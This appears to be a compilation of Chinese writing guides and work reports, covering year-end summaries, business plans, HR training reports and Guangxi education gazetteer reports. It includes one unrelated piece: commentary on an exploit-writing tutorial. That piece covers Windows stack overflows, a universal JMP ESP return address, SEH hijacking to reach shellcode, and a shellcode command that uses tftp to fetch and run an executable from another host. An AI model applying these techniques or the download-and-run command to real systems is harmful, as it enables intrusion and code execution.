以下是小编帮大家整理的年终工作总结编写指南,本文共12篇,仅供参考,希望能够帮助到大家。
篇1:年终工作总结编写指南
发愁年终工作总结?五步搞定!
第一步:标题要对
标题是文章的眼睛。一般年终总结虽然没有发挥的余地,但一定要写全面。这里就分别以小部门和大公司的总结标题举个例:
部门总结的标题:部门名称+年度名称+总结,如《市场部工作总结》;
大公司总结的标题:关于+公司名称+年度名称+本文内容+总结,如《关于XX公司度市场工作总结》,这样就比较全面。
标题规范有两个好处,一是方便年终总结的存档保存,二是便于查找,可谓是一举两得的事。
第二步:引言要精
年终总结的引言应短而精,官话、套话要少。
部门总结引言,可以直接用“现将市场部年度总结报上,请批示。”这样的形式作为部门总结的引言,既减少了领导查看的时间,避免了不必要的啰嗦,同时也为自己节约了时间。
大公司总结的引言就稍稍要比部门年终总结的引言多一点了,比如写成:
“今年,在公司各级领导的亲切关怀和正确领导下,在公司各部门的积极支持下,在市场部全体员工的共同努力下,我们取得了三方面的成绩:成功实现年营销任务5000万元,达到了历史最高水平;成功开发了两个年销售收入在500万的大客户,为明年销售收入上一个新台阶打下了坚实的基础;成功地进行了全员市场培训,营销人员的基本素质得到了全面的提高。下面将分四个部分向领导汇报。”
这样写的好处在于,若是总裁太忙,一看引言就知道你的主要工作成绩了。
第三步:总结要全
年终总结主要分两大部分,第一部分是总结,第二部分是特点。
总结部分要全面,把各级领导的关心、兄弟部门的支持、员工们的努力和部门的主要工作要写全面,但一般不要超过5点。特点是本年度、本文的精彩之处,与往年的不同之处,是本部门在本年度所做出的主要的、重要的成绩,一定要认真地在年终总结中写好。特点一般不要超过3点,多了就不是特点了,别人也不容易记住。
第四步:不足要准
一年工作一定会存在一些问题、不足和遗憾,而这也是在写年终总结时一定需要要找准了才能写的。特别是要把领导认为存在的问题、员工感觉存在的问题和阻碍公司发展的主要问题找准、找对,并深刻反省,写深写透。但一般说来,不足之处不要超过3点。
第五步:改进要实
针对成绩、特点和不足、问题,明年应该怎么办,这是在写年终总结时值得注意的地方,同时也是领导所关注的重点之一。因此,改进一定要以实际出发,要有具体的办法和措施、步骤,要事先征求领导和员工的意见,部门内要组织好学习和讨论,制定出切实可行的改进计划,并要得到领导的中肯和员工的认可。当然,小部门的话就可以稍微简单一点。
总之,文章写作有八股,功夫诗外无止境。光看笔头生花,没有扎实的工作、没有认真的调研、没有准确的分析,是写不出好的年终总结的。如果平时对于这些没有留心,到年底实在是对年终总结发愁,那也就只能硬凑一份算了。
篇2:商业计划书编写指南
附录B商业计划书实例参考
撰写商业计划书的基本内容【二】
一、项目简介
一页纸的“项目简介”商业计划书中最重要、也是最挑战你文笔的内容。好比电视广告,它如果不能在10秒钟内引起观众的兴趣,观众就会按遥控器换频道。
虽然“项目简介”像是你的商业计划书的“迷你版”,但它并非要包含商业计划书的每一个方面。
用一句话来清晰地描述你的商业模式,即你的产品或服务;
用一句话来明确表述为什么你的创新及时解决了用户的问题,填补了市场的空缺;
用一句话(包括具体数字)来描述巨大的市场规模和潜在的远景;
用一句话来概括你的竞争优势;
用一句话来形容你和你的团队是一个“成功组合”;
用一句话(包括具体数字和时间)来概述你将如何在最短的时间内让投资人赚翻;
用一句话来陈述你希望融多少钱、主要用来干什么。
二、产品/服务
产品和服务就是你的商业模式,也就是将来你的公司将靠什么去赚钱?
别说什么“我们要成为中国最大的。。。。。。”也别说自己是“最好最好的。。。。。。”最忌讳空洞的语言,要具体数字说话。
三、开发市场
市场可以从三个方面看:宏观的、微观的、以及具体你如何开发自己的市场。
宏观的:如果你所能得到的宏观市场数据是从互联网站上下载的免费报告,这一类的信息适可而止,VC/PE们也都在浏览互联网。重要的是与你的产品直接相关的市场数据,即你的微观市场、你力所能及的市场,这些数据越详细越好,华经纵横建议:如果自己没有这些数据就购买专业机构相关报告,即使你没有这些数据VC/PE自己都会去找的,你有“服务意识”的话,不如先把VC/PE要做的工作都先给做了,这样你拿到钱的时间也可能会提前。
然后,你要说明你如何来行之有效地做市场,别斗胆说你需要1000万去做媒体广告建立企业品牌…..初创的公司是没钱玩那些奢侈游戏的';你不如说“我们已经和海尔达成意向,通过他们的渠道进行捆绑在全国推广......”
四、竞争对手
我不相信有哪家公司没有任何竞争对手。
比如说,你研发了一种全新的节能空调,vc都会去行业老大那里打听,比如看看海尔是不是有同类的产品,或者问问海尔为什么自己不研发这类产品,再让海尔谈谈对这类产品的看法和观点......
要是竞争对手也是创业公司,别怕,你应该比他们做得更好,只要你的产品比竞争对手的更先进,投资者会支持你,到时候也许投资者把对手给收购了,这不就解决了竞争的问题吗?
五、团队成员
对于清华、北大等名牌学校的毕业生自然这是一个千载难逢的亮相机会,海龟们也不例外,即使在西半球的某个偏僻小镇上的学校里只泡上了几天,照样也可以在自己脸上贴金。每个人的工作经历也都是重要的内容哦,要是你在大公司比如google、微软工作过,人们就有可能想象你的水平和比尔盖茨也不相上下。
如果你既没有进过名牌的大学,也没有在著名大公司里工作过,千万不要有失落感。你最好不要含糊其辞说“我经验丰富、曾在某某公司工作......”你可以具体挖掘一下你的真实才能,你是学习什么专业的,曾在公司里担任什么职务,做过些什么项目......团队是VC/PE投资的对象,也是VC/PE重点关注的内容,记得除了包装你自己以外,别忘了把你的团队成员也作详细。
六、收入
创建公司就像盖一座高楼,什么时候地基落成、什么时候封顶、什么时候交钥匙都是工程中的关键节点。
对于早期的创业公司来说,投资者最关心的是什么时候公司的产品能够顺利通过各种测试推向市场?什么时候公司账上开始有收入进来?什么时候公司达到盈亏持平?
当然,持平并不是投资者的最终目的,公司收支打平了,投资者就有信心给你更多的钱去扩大规模、去进一步发展。创业者们应该明白,无论你创立什么样的公司,账面收支持平越早越好。一个公司开始有收入了,说明公司的产品有市场价值;一个公司盈亏持平,说明它是有盈利潜力的;只有具有盈利能力的公司,才是正真有价值的公司,因而才会有更多的VC/PE会青睐你,给你送来更多的钱。
仔细想好你将迈出的每一个重要的脚步,确定你的公司在走向成功和辉煌道路上的每一个重要的时间节点。
七、财务计划
财务预测是商业计划书中最重要的部分之一。通常VC/PE对有兴趣的项目一定会要求详细的财务介绍。记住:至少做3年的财务计划,最好做5年,把重点放在第一年。
篇3:可行性研究报告编写指南
一、客户必读
二.可研报告的基本问题
三、编制可研报告常见问题汇总
四、各种类型的可研报告
第二部分 项目建议书/项目立项申请报告
一、客户必读
二、项目建议书/项目立项申请报告基本问题
三、各类项目建议书的.编制
第三部分 项目申请报告
一、客户必读
二、项目申请报告基本问题
三、编制项目申请报告常见问题汇总
四、各种类型的项目申请报告
第四部分 资金申请报告
一、客户必读
二、资金申请报告基本问题
三、各种类型的资金申请报告
四、各种类型的项目申请报告
篇4:关于HR培训结案报告编写指南
对于培训报告不知道有什么好主意的HR们,戳戳这里吧《关于HR培训结案报告编写指南》
一个培训项目实施后,对于该培训项目的总结至关重要。一方面,通过培训项目总结可以向项目重要干系人(组织高层、人力资源总监或培训总监、业务部门负责人),汇报项目实施的信息,从而获得其对项目的关注和支持,对于培训管理工作的认可;另一方面,培训项目总结也是对于培训工作的知识管理,帮助培训管理者不断地改进完善工作,提升工作成果。
培训项目的总结通常是以培训结案报告的形式来呈现。根据组织对于汇报要求的偏好,可以采取纸质版报告、电子版报告或PPT版报告。争取组织高层的支持是做好培训工作的关键。如果向组织高层汇报培训信息,建议采取纸质版报告。
培训结案报告应该包含哪些内容和信息呢?
笔者认为,培训结案报告最基本的要素有:报告封面、目录、培训执行概述、培训图片回顾、培训效果评估、总结。以下详解之。
一、报告封面
报告封面的制作风格应简约,主要包含“某培训项目结案报告”、“呈报时间”、公司LOGO等简单信息即可。封面可配图片。图片宜选择具有代表性的专业职场图片,也可以用本公司的专用图片。所有的培训结案报告要在风格上保持一致(或使用统一的结案报告模板)。制作优良的结案报告图片既可以传递一种专业的态度,也可以在第一时间吸引读者的注意力。
二、目录
培训结案报告虽然篇幅不大,但最好配有目录,以体现报告的专业性。
三、培训执行概述
培训执行概述主要是对培训项目的回顾。陈述的内容有项目时间、项目名称、讲师、供应商、参训学员、培训主要内容、授课现场情况,以及培训效果评分等相关信息。
四、培训图片回顾
培训图片回顾主要是将培训图片进行剪辑、编排与说明。所配图片应尽量做到对于培训的全面回顾:既有学员集体照,也有单人学习照;既有讲师授课照,也有学员发言照;既有学员倾听照,也有小组互动照;既有近景特写照,也有愿景全貌照。所有图片按培训实况顺序排列图片。每张图片配说明性文字,图文并茂。
五、培训效果评估
培训效果评估主要是对效果评估问卷反馈信息的统计与呈现。可能包括的内容有:基本信息、教学效果评估、随堂测验评估、培训的收获、对于培训建议、进一步培训的需求等。
基本信息包括课程名称、时间、地点、讲师、参训人调查人数等;
教学效果评估是针对教学的环节进行的评估。评估应不仅仅表现出最终的统计分数,最好能够按照效果评估问卷的框架展示出各项得分情况,即每一项有几个人给了10分,几个人给了9分,平均分是多少。将各项得分的平均分相加,就是本次培训的总平均分数。这样做的好处是可以让我们更清晰地了解到,对于培训效果影响的因素。
随堂测验评估是针对学员进行的评估(如果安排培训有随堂测验的环节)。通过他可以了解学员对于所学内容的掌握情况。可将每个学员及其测验分数用表格的形式来进行呈现。
“培训的收获”、“对于培训的建议”、“进一步培训的需求”等都是学员对于培训所表达的主观感受和期望。既有相同相似的部分,也会有个性化的部分。同时,既可以分别呈现每个学员的感受和期望,也可以将相同相似的感受和期望归纳后统一呈现。但不论何种方式,每类感受后面最好标注出评价者的姓名。这样有利于培训管理者以及报告审阅者对于培训的效果有更加具体和客观的认识。
六、总结
总结可以包含三部分的内容。
第一部分,再次对于培训的整体效果进行一个概括性的陈述,着重强调本次培训带来的收益和影响。
第二部分,总结本次培训执行过程中出现的问题和失误,提出未来改进的思路和方法。
第三部分,根据学员在培训过程中表现及反馈,对于企业培训的开展和规划提出意见和建议。
篇5:年终工作总结编写攻略
攻略:如何做漂亮的年终工作总结!
摘要:
总结是个量化工程,可惜属于管理类的行政、人资等部门可不好真办:说数据,鸡毛蒜皮难量化;说功绩,无凭无据难说起;说战略,啥子战略才合理?……最后,只好列列流水帐,然后就是人事部果然是事多无功部,接着自己也跟着大郁闷:辛苦一年,一地鸡毛,一声叹息!!!
其实将无形的工作有形化,将不可量化的事宜数量化,下面将为各位分享一二~
攻略一 :换上老板的脑袋找准总结方向
总结是写给老板看的,那么下笔一定要扣紧老板的脑袋。每个公司的老板关注的HR话题不同,那么做为HR的你,就需要关注老板同时与你聊天最先问的问题、要资料或报表时最喜欢问起的内容,有方法的还可以去看下老板的工作报告或者是重大场合的讲话。了解下他们关注的问题。只有知道老板关注的HR主题,才能让自己的工作成为老板眼中的“重点”,从而体现价值。(当然,如果你有把握比老板想的更远,且让老板认同的除外)。
小贴士——老板经常关注的问题:核心职位的招聘情况、核心员工的流失情况、整体薪酬成本问题、业务部门员工满意度问题
攻略二:千方百计量化您的工作成果
前面我们说过管理类的HR工作很难量化,但其实很多HR在现实工作中还是背负了很多KPI的,譬如:员工流失率、在职员工培训完成及时率、在职员工绩效完成率等等。可是HR对于这类KPI的控制力往往有限,于是KPI的结果有时候会很不好写一年工作的效果在哪里。其实对于此类KPI,可以先看绝对数量是否达标,如果绝对数量不达标,则可以看看相对数量(例如:与过去同期比较、与同行业比较、与部门比较等)。
另外,还有一些指标可以加入一些过程数据的说明,譬如:招聘效果的指标往往是很不可控的数据,但HR在这个过程中往往做了举办招聘会、筛选简历、电话面试等很多的工作,这些过程性的数据也需要列举出来。这样虽然不能替代KPI的评价,但却可以从另一个角度表现工作的量。
小贴士——用图表结合数据让您的工作成果量化:在表现量化的工作成果时,最关键的要做到简洁、明了,切中要害,因此图表成为最好的表现和分析的手段。目前很多HR类的小软件都可以帮助HR做出漂亮的数据报表。
攻略三:合理搭配、真诚分析包装你的工作成果
前面我们说到要从老板关注的点来构思总结,那么真正的体现在于:首先从宏观、大的方向列举年度重点的工作内容。有朋友可能要问了,万一这些内容都不好看,完成的不好怎么办?这个时候,可以对这些短板项目做个真诚的分析与说明。
这样的分析说明可以借助类似SWOT分析等工具来进行,虽然这样的分析无法挽回最终的评价,但至少可以让老板或上司知道你对自己不足已经认识到并做了细致的分析,这样的态度证明了你未来的工作潜力。此外,从个人的角度,这样的分析也有利于明确自己未来努力的方向。
小贴士——SWOT的分析方法:可以从优势、劣势,机会和威胁来分析相关工作成果,从而列出可行的改进措施。
攻略四:总结过去一定要展望未来
过去也许影响了年终奖,但未来则决定明年的位置,因此当年终总结对过去回顾清晰后,未来的行动更是需要浓墨重彩。HR的工作有一定常规与变化性,常规类的工作可以按模块来条理化,而变化性的工作重点的还是要结合公司的整体战略或者是核心业务部门的发展需求来做一个配合。重点要突出对于企业发展、业务发展的战略伙伴的位置,并且尽可能列举一些行动的具体方案与目标。
小贴士——行动计划也需模块化:有些HR的工作可能不由自己安排,由上级或老板布置,但在对未来进行展望时,一定要从自己的职责出发,对工作计划进行分类和详略分析,这样才能让她的工作计划显得可执行和到位。
篇6:观《菜鸟版Exploit编写指南》有感
第一个问题:JMP ESP地址的通用性问题,
F.Zh在两篇文章中都强调JMP ESP的操作码在内存中的地址,它对版本是有依赖性的,并强调多一次机会放上两个版本的返回码,可以多一次成功的机会。
开始自己也是这么认为的,但后来偶然查到,Lion公布了跳转到EBX的通用地址,也就是F.Zh文章中所说的0x7FFA1571,而且Lion后来也公布了JMP ESP的通用地址--0x7ffa4512。
查到这个,心中狂喜!马上按F.Zh介绍的方法,写出LSA的溢出程序,并放上0x7ffa4512作为跳转地址。然后测试了中文Windows 的所有SP版本,还有XP和,发现都是有效的。因为这个地址会给大家很大的帮助,所以这里说说,作为F.Zh文章的补充吧。
第二个问题:可以利用jmp /call ebx的原理。
F.Zh在讲用JMP ESP覆盖返回地址方法的时候,写地很清楚了,建议大家仔细阅读。但在讲用“jmp / call ebx”覆盖异常的时候,F.Zh只是说I=2844的地方放“jmp / call ebx”,程序就会执行到I=2840,我们在I=2840的地方放“NOP/NOP/Jmp 4”,在I=2248放上我们的ShellCode,就可以完成跳转了!但自己心中就有个疑问:为什么执行“jmp /call ebx”会到前面4个字节呢?
后来查了大量资料和文章,发现机制原来是这样的:在用JMP ESP覆盖返回地址方法时,我们知道将返回地址覆盖成另一个地址。但如果是个无效的地址呢?那里指向的数据或许不能读,或许不能执行,那会怎么样呢?
其实相信大家都遇到过,那就是系统会弹出个对话框报错,我们点确定,就会终止运行。这是因为作为一个系统级的程序,内部有健全的出错处理机制。简单的说,如果运行时有错误产生,Windows就会跳到一个专门处理错误的地方,对应不同的错误,执行不同的代码。上面执行的代码就是弹出个对话框报错。Windows处理错误的机制
当有异常错误发生时,EIP指向上图的“处理程序地址”,而EBX自动为“下一处理地址”,这样就可以把异常处理地址连接起来,形成了一个异常处理串,
所以这里我们故意把返回的地址覆盖成一个错误的地址。出错时,Windows就会跳到处理错误的入口,而EBX指向入口前4个字节的地方,我们在这里毫不客气的一起覆盖了!哈哈!情况变成下面这样了,那当然可以跳到ShellCode了,这就是接管异常,听起很有成就感吧?!
第三个问题:检查覆盖地址错误还是ShellCode被改变的方法。
在第二篇文章中,F,Zh重点在于如何找到要覆盖地址的位置。方法很巧妙,也很实用,但只是在找到覆盖的地方后,简单的附加上了现成的ShellCode。利用该方法,在实际的应用中常常不能一下就成功的实现ShellCode的功能。
这可能有两个原因,一或者是覆盖地址不对,二或者是ShellCode中的一些字符或者被改变、截断,表现出来就都是完成不了我们想要的功能。在这种情况下,我们需要知道究竟是覆盖地址错误了,还是ShellCode被改变了?
在经过大量的测试后,自己发现一个很适合我们菜鸟的简单方法来判断,即在ShellCode的第一句添上“xeb\\xfe”,即是“jmp C1”一个死循环,不要小瞧它,在调试中是很有用的。我们运行写好的Exploit攻击程序,如果返回地址正确,那么就会跳入“\\xeb\\xfe”这句死循环中,我们可以用调出SoftIce,发现一直陷入这句指令不走了,然后对照跟在后面的ShellCode,看它是否和我们编写的一样,这样可以比较容易的发现问题。
如果发现没有陷入“\\xeb\\xfe”这句死循环,那可以肯定覆盖的地址就是错的,需要重新定位覆盖点,或换成通用的覆盖地址。举个实际的例子来说吧:
自己在利用ROOT的程序测试Foxmail的漏洞时,就是用该方法来发现ROOT给的返回地址在自己的机子上是无效的,溢出后进入不了“\\xeb\\xfe”这句死循环,所以自己就换了一个返回地址,终于可以进入“\\xeb\\xfe”了,但还是完成不了功能,再对照ShellCode发现原来是“cmd /c tfpt CI 192.168.1.1 get abc.exe & abc.exe”这句中的“cmd /c”的“/”被替换了。知道问题就好办了,换了一个合要求的就可以了,呵呵。
有些时候经验是可遇不可求的,所以写出来,希望对大家能有点帮助,自己就很高兴了(脚本小子:那么高兴,稿费就算了吧?•#¥!%¥#%¥¥#)。
篇7:工作总结写作指南
工作总结写作指南
眼下,正值辞旧迎新之际,一年一度的“工作总结”又开始粉墨登场了。于是各单位各部门拿出“浑身解术”,通过“秀才”们的浓墨重彩,总结一年来所干的.工作,这本无可厚非,实属正常。但笔者认为,“工作总结”切勿脱离实际,唱高调,拣好听的说,必须有一说一,有二说二,客观地评说,总的来说,这“工作总结”一定要杜绝“三忌”。
一忌夸夸其谈,夸大其词。这一年来干了哪些工作,上级部门知晓,老百姓的心里也有数,自己也应如实汇报。干得好,群体心里有杆秤,自然能秤出其分量,干得好,要总结经验话得失。总之“有则改之,无则加勉”,切不要夸大政绩,欺上瞒下。
二忌避重就轻。一些部门、单位在工作总结时往往“好大喜功”,对成绩大肆渲染,小事说成大事,芝麻说成了西瓜,摆功臣,讲苦功,好事说了一大堆,好话说了一大箩。而在总结过失和不足时,总是轻描淡写,几句话一带而过,有的甚至“大事化小,小事化了”,片面地多讲客观,而少讲主观。因此“工作总结”应多讲工作中的不足和存在的实际问题。
三忌长篇大作。一些部门单位在“工作总结”时认为,总结写得好,说明工作干得多、干得好,有“水平”,否则相反。于是一些单位的“工作总结”中废话、大话、瞎话和“牛头不对马嘴”的话充斥于总结中,令人有华而不实的感觉。同时内容空洞,东拼西凑的总结还严重地浪费了人力、物力和财力,助长了不正之风的滋生。
因此,“工作总结”应实事求是,少讲空话,切实转变工作作风。
篇8:教育志编写工作总结
一、贯彻《条例》,狠抓志稿质量
我室的主要工作是编纂第二轮《广西通志教育志》,同时积极完成自治区地方志编纂委员布置的地情书任务。20xx年,我室工作重点是根据中国地方志指导小组印发的《地方志书质量规定》修改、审核第二轮《广西通志?教育志》,做法是:
(一)审查落实志稿内容的全面性。
内容的全面性是志书的基本要求,我们认真审查篇目、适当调整篇章和补充重要内容,防止“硬伤”;认真编写、修改重点篇章,体现本志特色。
一是根据经自治区地方志办公室审核的编写提纲、第一轮教育志的情况和广西教育的实际,对前志没有的“教育人物”、“民办教育”、“教育法制与政策”、“语言文字工作”等独立设篇,前志没有的“研究生教育”在高等教育篇中单独设章,在“少数民族教育”篇中把广西11个少数民族的教育事业设立章节分别记述,在这些方面花费了很大力量,认真编写和修改,有所突破,反映本志特色;
二是根据教育工作实际,“普九”是本志时限内教育工作的“重中之重”,普及九年义务教育于20xx年通过了国家教育部检查验收的情况,把“普及九年义务教育”章的下限调至20xx年,使该项内容体现完整性,是本志的亮点之一;范文写作三是针对前志很少反映教育人物在教育发展与改革中的活动和作用,在本志有关篇章中注意贯彻“以事系人”的原则,反映教育人物的活动和作为;四是对办学条件内容整合为“教育资源”篇,把“教育工程”、“教师队伍”、“教育技术”、“教育国际交流与合作”等设章记述,体现本志的时代性和特点,是本志又一亮点;五是在本轮修志年限内进行了多次学生体质调查,主编收集整理了这方面的资料,我们认为很有价值,打算编入《附录》。
(二)认真审核志稿资料的真实性。
资料真实性是志书的灵魂,我们一直重视和抓住这个问题,认真研究解决。有如下几种方式:
1、将初编志稿反馈给作者再审核,全面审核一次。
2、编写人员到有关事件、资料发生地再核实,关于少数民族教育志稿由覃盛裕到罗城、环江、三江等县调查、审核、补充。
3、将有关志稿咨询相关人员审核,如“高校科学研究”志稿由教育厅科研处撰稿,请曾经从事过这项工作的覃少华审阅、提出修改意见;又如“教师教育”篇由教育厅师范教育处审核;再如“教育技术”章由从事该项工作的广西电教馆教研室潘志诚撰稿和审核、“基础教育课程改革”章由从事该项工作的广西教育学院教研部陆云撰稿和审核;等等。
4、调整编写人员,技工学校教育和职业技能培训的章节,商请自治区劳动与社会保障厅有关人员撰写和审核。
5、在数据运用方面,强调有公开发布的一定要用公开发布的,体现合法性。
6、对资料运用强调注明出处。
(三)审核志稿编写的规范性。
一是对照地方志编写要求,认真审核。这些志稿虽通过公布样章样节并召开评稿会后修改定稿,还决定以新的志书质量标准重新对全书14篇73章及附录进行认真审稿。二是在编辑过程中对文稿按编写要求认真修改、调整、补充。三是制定审稿规则和表格,要求审稿人写出审稿的总评和审稿总意见并在表格上签字负责。审稿人对志稿某一部分的具体意见则直接写在志稿上。此项工作20xx年12月完成。
同时,指导一些市(县)编纂教育志和各院校编纂院校志。20xx年~20xx年编纂市(县)教育志的有桂林市和玉林市及其所属县;20xx年,本志主编指导广西艺术学院编写院史,对编写人员讲述史志编写知识和要求,修改编写提纲,审阅史书文稿,《广西艺术学院史》已于该院院庆时面世;院校志(含已出版)有广西民族大学年鉴、玉林师范学院年鉴、广西水利电力职业技术学院志等;南宁市教育志、桂林市教育志、玉林市教育志正在编写中;平乐县教育志已经编好并进行了评审,因经费问题尚未出版。
20xx年,我室还接待了区财政厅财政志编写人员的咨询。
二、修志工作落实“一纳入、五到位”情况
根据自治区地方志编纂委员的.督察内容,我室要按(桂政发[]66号文件)提出的“一纳入”“五到位”的要求作自查。所谓“一纳入”,即把编纂地方志工作纳入本地区经济社会发展计划和各级政府纳入党委、政府工作的`议事日程;“五到位”即领导到位、经费到位、机构到位、条件到位等,使修志得到一定的条件保证。
教育厅有关领导认真协调有关工作。在加强领导同时稳定编写队伍,对个别负责同志工作变动“战役中不换将”。20xx年,教育厅领导加强协调工作,对编写进度慢的部门负责人打招呼,办公室对承担某些篇章稿件的敦促协调工作,体现全厅一盘棋上下协作的编纂精神。原有个别处室和个别二层机构的稿件一直拖到今年年底,在厅办公室敦促下完成初稿。厅办公室的这种一盘棋上下协作的精神值得发扬。
20xx年按照预算落实有关经费。
20xx年,解决了一个大问题,就是将编纂劳务费提高到与其他厅(局)一样,即主编、副主编每人每月补助1000元,普通编纂人员950元。但劳务费增加,年经费没有增加,现劳务费约占全年经费约75%,其他开支显得拮据。自治区地方志办公室20xx年督查后,教育厅领导研究调整了编写人员的劳务津贴。
我室挂靠广西教科所思想汇报专题,打印、复印使用教科所的设备。志稿打印工作量很大,我们采取多种办法解决。一是对志稿作者要求尽可能提交电子文稿;二是对提交纸质文稿的由我室挂靠广西教科所负责录入,有时由教育厅办公室文印录入;三是本志编辑室负责录入。
三、第二轮地方志编纂工作进度与计划安排
到20xx年12月底止,除个别章节外已完成了初稿。
据初步统计,《广西通志.教育志》文字突破原定100万字,预计达到120万字。计划在上半年全部完成初稿(文字稿),并进行认真审核,组织一次志稿评审,然后再作修改。争取在20下半年送审评稿。
采取有关措施:一是进一步落实编写责任制;二是狠抓薄弱环节,组织力量攻坚;三是邀请专家、行家审阅志稿;四是建议教育厅采取激励措施。
四、修志工作遇到的主要问题
一是资料收集困难。有些处室相关资料保存不完整;市县教育志、院校志未启动;编纂志书与编写年鉴是两个组织负责,资料不衔接、口径不一致;由于历史原因,教育统计指标、口径前后不完全一致、有的不衔接,对教育数据使用造成困难,如民办教育数据在教育统计年报没有明确反映。
二是志稿打印工作量大,教育厅机关办公地变迁,联系不方便。由于厅办公楼搬迁,我室留在原址带来一定困难,上级文件、信件交换不及时。
三是主编、副主编工作量大,负担过重;很多编写人员不懂电脑操作,不能使用电脑修改。
篇9:教育志编写工作总结
一、贯彻《条例》,狠抓志稿质量
我室的主要工作是编纂第二轮《广西通志?教育志》,同时积极完成自治区地方志编纂委员布置的地情书任务。
xxxx年,我室工作重点是根据中国地方志指导小组印发的《地方志书质量规定》修改、审核第二轮《广西通志?教育志》,做法是:
(一)审查落实志稿内容的全面性。
内容的全面性是志书的基本要求,我们认真审查篇目、适当调整篇章和补充重要内容,防止“硬伤”;认真编写、修改重点篇章,体现本志特色。一是根据经自治区地方志办公室审核的编写提纲、第一轮教育志的情况和广西教育的实际,对前志没有的“教育人物”、“民办教育”、“教育法制与政策”、“语言文字工作”等独立设篇,前志没有的“研究生教育”在高等教育篇中单独设章,在“少数民族教育”篇中把广西11个少数民族的教育事业设立章节分别记述,在这些方面花费了很大力量,认真编写和修改,有所突破,反映本志特色;二是根据教育工作实际,“普九”是本志时限内教育工作的“重中之重”,普及九年义务教育于xxxx年通过了国家教育部检查验收的情况,把“普及九年义务教育”章的下限调至xxxx年,使该项内容体现完整性,是本志的亮点之一;范文写作三是针对前志很少反映教育人物在教育发展与改革中的活动和作用,在本志有关篇章中注意贯彻“以事系人”的原则,反映教育人物的活动和作为;四是对办学条件内容整合为“教育资源”篇,把“教育工程”、“教师队伍”、“教育技术”、“教育国际交流与合作”等设章记述,体现本志的时代性和特点,是本志又一亮点;五是在本轮修志年限内进行了多次学生体质调查,主编收集整理了这方面的资料,我们认为很有价值,打算编入《附录》。
(二)认真审核志稿资料的真实性。
资料真实性是志书的灵魂,我们一直重视和抓住这个问题,认真研究解决。有如下几种方式:
1.将初编志稿反馈给作者再审核,全面审核一次。
2.编写人员到有关事件、资料发生地再核实,关于少数民族教育志稿由覃盛裕到罗城、环江、三江等县调查、审核、补充。
3.将有关志稿咨询相关人员审核,如“高校科学研究”志稿由教育厅科研处撰稿,请曾经从事过这项工作的覃少华审阅、提出修改意见;又如“教师教育”篇由教育厅师范教育处审核;再如“教育技术”章由从事该项工作的广西电教馆教研室潘志诚撰稿和审核、“基础教育课程改革”章由从事该项工作的广西教育学院教研部陆云撰稿和审核;等等。
4.调整编写人员,技工学校教育和职业技能培训的章节,商请自治区劳动与社会保障厅有关人员撰写和审核。
5.在数据运用方面,强调有公开发布的一定要用公开发布的,体现合法性。
6.对资料运用强调注明出处。
(三)审核志稿编写的'规范性。
一是对照地方志编写要求,认真审核。这些志稿虽通过公布样章样节并召开评稿会后修改定稿,还决定以新的志书质量标准重新对全书14 篇73章及附录进行认真审稿。二是在编辑过程中对文稿按编写要求认真修改、调整、补充。三是制定审稿规则和表格,要求审稿人写出审稿的总评和审稿总意见并在表格上签字负责。审稿人对志稿某一部分的具体意见则直接写在志稿上。此项工作xxxx年12月完成。
同时,指导一些市(县)编纂教育志和各院校编纂院校志。xxxx年~xxxx年编纂市(县)教育志的有桂林市和玉林市及其所属县;xxxx年,本志主编指导广西艺术学院编写院史,对编写人员讲述史志编写知识和要求,修改编写提纲,审阅史书文稿,《广西艺术学院史》已于该院院庆时面世;院校志(含已出版)有广西民族大学年鉴、玉林师范学院年鉴、范文TOP100广西水利电力职业技术学院志等;南宁市教育志、桂林市教育志、玉林市教育志正在编写中;平乐县教育志已经编好并进行了评审,因经费问题尚未出版。
xxxx 年,我室还接待了区财政厅财政志编写人员的咨询。
二、修志工作落实“一纳入、五到位”情况
根据自治区地方志编纂委员的督察内容,我室要按(桂政发[2000]66号文件)提出的“一纳入”“五到位”的要求作自查。所谓“一纳入”,即把编纂地方志工作纳入本地区经济社会发展计划和各级政府纳入党委、政府工作的议事日程;“五到位”即领导到位、经费到位、机构到位、条件到位等,使修志得到一定的条件保证。
教育厅有关领导认真协调有关工作。在加强领导同时稳定编写队伍,对个别负责同志工作变动“战役中不换将”。xxxx年,教育厅领导加强协调工作,对编写进度慢的部门负责人打招呼,办公室对承担某些篇章稿件的敦促协调工作,体现全厅一盘棋上下协作的编纂精神。原有个别处室和个别二层机构的稿件一直拖到今年年底,在厅办公室敦促下完成初稿。厅办公室的这种一盘棋上下协作的精神值得发扬。
xxxx年按照预算落实有关经费。
xxxx 年,解决了一个大问题,就是将编纂劳务费提高到与其他厅(局)一样,即主编、副主编每人每月补助1000元,普通编纂人员950元。但劳务费增加,年经费没有增加,现劳务费约占全年经费约75%,其他开支显得拮据。自治区地方志办公室xxxx年督查后,教育厅领导研究调整了编写人员的劳务津贴。
我室挂靠广西教科所思想汇报专题,打印、复印使用教科所的设备。
志稿打印工作量很大,我们采取多种办法解决。一是对志稿作者要求尽可能提交电子文稿;二是对提交纸质文稿的由我室挂靠广西教科所负责录入,有时由教育厅办公室文印录入;三是本志编辑室负责录入。
三、第二轮地方志编纂工作进度与计划安排
到xxxx年12月底止,除个别章节外已完成了初稿。
据初步统计,《广西通志?教育志》文字突破原定100万字,预计达到120万字。计划在年上半年全部完成初稿(文字稿),并进行认真审核,组织一次志稿评审,然后再作修改。争取在2009年下半年送审评稿。
采取有关措施:一是进一步落实编写责任制;二是狠抓薄弱环节,组织力量攻坚;三是邀请专家、行家审阅志稿;四是建议教育厅采取激励措施。
四、修志工作遇到的主要问题
一是资料收集困难。有些处室相关资料保存不完整;市县教育志、院校志未启动;编纂志书与编写年鉴是两个组织负责,资料不衔接、口径不一致;由于历史原因,教育统计指标、口径前后不完全一致、有的不衔接,对教育数据使用造成困难,如民办教育数据在教育统计年报没有明确反映。
二是志稿打印工作量大,教育厅机关办公地变迁,联系不方便。由于厅办公楼搬迁,我室留在原址带来一定困难,上级文件、信件交换不及时。
篇10:编写县志和区志工作总结
编写县志和区志工作总结
一、主要工作:
1.进一步提高修志队伍整体素质
